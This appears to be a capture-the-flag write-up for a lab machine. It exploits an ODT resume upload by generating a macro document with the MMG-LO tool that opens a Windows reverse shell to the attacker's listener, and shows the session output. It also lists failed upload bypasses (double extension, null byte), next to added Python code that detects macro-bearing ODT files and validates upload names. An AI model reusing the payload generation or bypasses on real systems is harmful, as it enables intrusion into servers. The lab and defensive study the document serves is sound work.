ODT File Upload


The target web application features a file upload function designed to receive resumes from candidates. The upload.php file handles this upload and restricts accepted file types to ODT (Open Document Text) files. Observations suggest that the uploaded files are actively processed on the server, raising the possibility that the system has Microsoft Office or the LibreOffice suite installed. If this assumption holds, it opens an avenue for further exploration: uploading an ODT file containing a malicious macro payload that could be executed when the file is processed.
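As an added defender-side check (example code written for this edit, not part of the original write-up or of the MMG-LO project): an ODT is a ZIP package, and LibreOffice stores Basic macro libraries under Basic/ and scripting-framework scripts under Scripts/, with every part listed in META-INF/manifest.xml. The function below inspects an uploaded file for those locations so that a server can refuse macro-bearing documents before handing them to an office suite. The sample package it builds is constructed for the demonstration and contains no macro code, only the directory layout; the path prefixes and mimetype string assume the standard ODF 1.2 package layout.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

ODT_MIMETYPE = "application/vnd.oasis.opendocument.text"
MANIFEST_NS = "urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
# Package locations where LibreOffice keeps executable content:
# Basic/ for StarBasic libraries, Scripts/ for Python/BeanShell/JavaScript.
MACRO_PREFIXES = ("Basic/", "Scripts/")


def inspect_odt(data: bytes) -> dict:
    """Describe an uploaded ODF package: is it a ZIP, what mimetype it
    declares, and which entries (in the archive and in the manifest)
    sit in a macro location."""
    findings = {
        "valid_zip": False,
        "mimetype": None,
        "macro_entries": [],
        "manifest_macro_entries": [],
        "has_macros": False,
    }
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        findings["valid_zip"] = True
        names = zf.namelist()
        if "mimetype" in names:
            findings["mimetype"] = zf.read("mimetype").decode("ascii", "replace").strip()
        # Entries physically present in a macro directory.
        findings["macro_entries"] = [n for n in names if n.startswith(MACRO_PREFIXES)]
        # Entries the manifest claims; a mismatch with the archive is itself suspicious.
        if "META-INF/manifest.xml" in names:
            root = ET.fromstring(zf.read("META-INF/manifest.xml"))
            for entry in root.iter(f"{{{MANIFEST_NS}}}file-entry"):
                path = entry.get(f"{{{MANIFEST_NS}}}full-path", "")
                if path.startswith(MACRO_PREFIXES):
                    findings["manifest_macro_entries"].append(path)
    findings["has_macros"] = bool(findings["macro_entries"] or findings["manifest_macro_entries"])
    return findings


def is_acceptable_odt(data: bytes) -> bool:
    """Accept only a well-formed package that declares the ODT mimetype
    and carries no macro storage at all."""
    f = inspect_odt(data)
    return f["valid_zip"] and f["mimetype"] == ODT_MIMETYPE and not f["has_macros"]


def build_sample_odt(with_macro: bool) -> bytes:
    """Constructed sample package for the demonstration: the ODF skeleton
    (mimetype, manifest, content.xml) plus, optionally, an empty Basic
    library layout. No macro code is included; the check keys on location."""
    entries = [("content.xml", "text/xml")]
    if with_macro:
        entries += [("Basic/script-lc.xml", "text/xml"),
                    ("Basic/Standard/Module1.xml", "text/xml")]
    manifest = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<manifest:manifest xmlns:manifest="{MANIFEST_NS}" manifest:version="1.2">\n'
        f' <manifest:file-entry manifest:full-path="/" manifest:media-type="{ODT_MIMETYPE}"/>\n'
        + "".join(f' <manifest:file-entry manifest:full-path="{p}" manifest:media-type="{m}"/>\n'
                  for p, m in entries)
        + "</manifest:manifest>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF requires the 'mimetype' entry first and uncompressed.
        zf.writestr("mimetype", ODT_MIMETYPE, compress_type=zipfile.ZIP_STORED)
        zf.writestr("META-INF/manifest.xml", manifest)
        for path, _ in entries:
            zf.writestr(path, "<!-- placeholder body -->")
    return buf.getvalue()


if __name__ == "__main__":
    print("clean  :", is_acceptable_odt(build_sample_odt(with_macro=False)))
    print("macro  :", is_acceptable_odt(build_sample_odt(with_macro=True)))
    print("not zip:", is_acceptable_odt(b"not a zip at all"))
```

The check is deliberately structural: it flags macro storage whether or not the module bodies look harmful, and it reads the manifest as well as the archive listing so that an entry hidden from one side still shows up on the other. Whatever the result, any server-side conversion of user documents should run with macro execution disabled, so that a document that slips past the filter still cannot run code.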

Exploit


MMG-LO is a set of Python scripts for generating office document files in various formats with a reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ git clone https://github.com/0bfxgh0st/MMG-LO
Cloning into 'MMG-LO'...
remote: Enumerating objects: 226, done.
remote: Counting objects: 100% (135/135), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 226 (delta 71), reused 75 (delta 40), pack-reused 91 (from 1)
Receiving objects: 100% (226/226), 647.40 KiB | 6.81 MiB/s, done.
Resolving deltas: 100% (111/111), done.

Cloning the exploit repo

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ python3 MMG-LO/mmg-odt.py windows $tun0 9999                                                  
[+] Payload: windows reverse shell
[+] Creating malicious .odt file
 
Done.

Generating a malicious ODT file

Exploitation


Uploading

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/craft]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.138.169] 49941
PS C:\Program Files\LibreOffice\program>
PS C:\Program Files\LibreOffice\program> whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> hostname
CRAFT
PS C:\Program Files\LibreOffice\program> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::2cf0:b138:c2e1:e87b%5
   IPv4 Address. . . . . . . . . . . : 192.168.138.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.138.254

Initial foothold established on the target system as the thecybergeek user via a client-side attack

PHP Upload to /uploads Directory (Fail)


Altering the filename so that the upload lands in the /uploads directory fails initially because of the file extension check.

uploads/shell.php.odf was accepted; however, clicking the file only downloads it instead of executing it.

Null byte injection failed as well.
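An added example of the server-side name handling that defeats the three attempts above (renamed file, double extension, null byte). It is written for this edit in Python and is not the target's upload.php; the ODT-only allowlist and the random stored-name scheme are assumptions.

```python
import re
import secrets
from typing import Optional

ALLOWED_EXTENSIONS = {"odt"}  # assumption: the application only wants ODT resumes
_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_upload_filename(filename: str) -> Optional[str]:
    """Return the name under which the file will be stored, or None to reject.

    The client-supplied name is never reused on disk: it only has to pass
    the checks, after which the server picks a random stem and keeps the
    normalized extension."""
    # Null byte: a name such as shell.php\x00.odt is refused outright, before
    # any lower-level API could silently truncate it at the NUL.
    if "\x00" in filename:
        return None
    # Drop any directory part the client sent (../, absolute paths, backslashes).
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Exactly one dot, so a double extension like shell.php.odf is rejected
    # regardless of which extension the web server would act on.
    parts = base.split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts
    ext = ext.lower()
    if not _STEM.fullmatch(stem) or ext not in ALLOWED_EXTENSIONS:
        return None
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name in ("resume.odt", "shell.php", "shell.php.odf", "shell.php\x00.odt", "../../cv.odt"):
        print(repr(name), "->", validate_upload_filename(name))
```

Pair this with the content check on the package itself: the extension rule decides what the file is called, the package inspection decides whether its contents are what the extension promises. Serving the uploads directory without script execution (or from a separate origin) is the matching web-server side of the same control.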